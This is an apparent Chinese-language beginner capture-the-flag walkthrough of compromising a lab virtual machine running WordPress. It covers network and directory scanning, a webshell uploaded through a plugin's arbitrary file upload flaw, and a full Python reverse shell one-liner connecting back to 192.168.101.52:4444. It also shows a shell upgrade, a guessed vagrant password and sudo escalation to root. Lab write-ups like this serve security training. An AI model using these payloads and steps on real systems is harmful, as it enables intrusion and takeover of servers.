难度:初学者
思路:扫目录→发现目录遍历→发现一个wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag
首先扫描网络获取靶机ip
代码语言:javascript复制arp-scan -l
接着nmap扫描这个ip,看到开启80、22端口
代码语言:javascript复制nmap -sV 192.168.101.50
访问80端口,看到使用wordpress搭建
使用wpscan扫描一下无结果
使用dirb扫一下目录,得到了4个目录
代码语言:javascript复制dirb http://192.168.101.50 
访问一下,发现存在目录遍历
查找到这个地址,
用wpscan扫描一下,没有发现什么有价值的东西
随便点开一个看看,f12审查元素,发现一个wordpress插件
查找一下有没有漏洞,发现存在任意文件上传
上传图片马,burp抓包改后缀为php
上传成功,返回了上传路径
蚁剑成功连接
发现不是root权限
接下来进行提权,再次上传可以执行系统命令的文件,注意改成get方式提交,post也可以不过需要hackbar工具,这里为了方便使用get
使用python反弹shell
代码语言:javascript复制a=python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.101.52",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
成功反弹shell
获取一个交互式shell
代码语言:javascript复制python3 -c 'import pty; pty.spawn("/bin/bash")'
来到/home目录发现三个用户目录
查看james发现user.flag
无法查看其中信息,估计是没有权限
查看/etc/passwd发现了这三个用户(爆破获取vagrant密码是vagrant)其实是看到网上教程得到的,其实这里不会
切换到vagrant用户,发现可以执行所用命令
直接sudo su提权,成功得到user.txt
切换到root目录下成功获取root.txt
base64解码
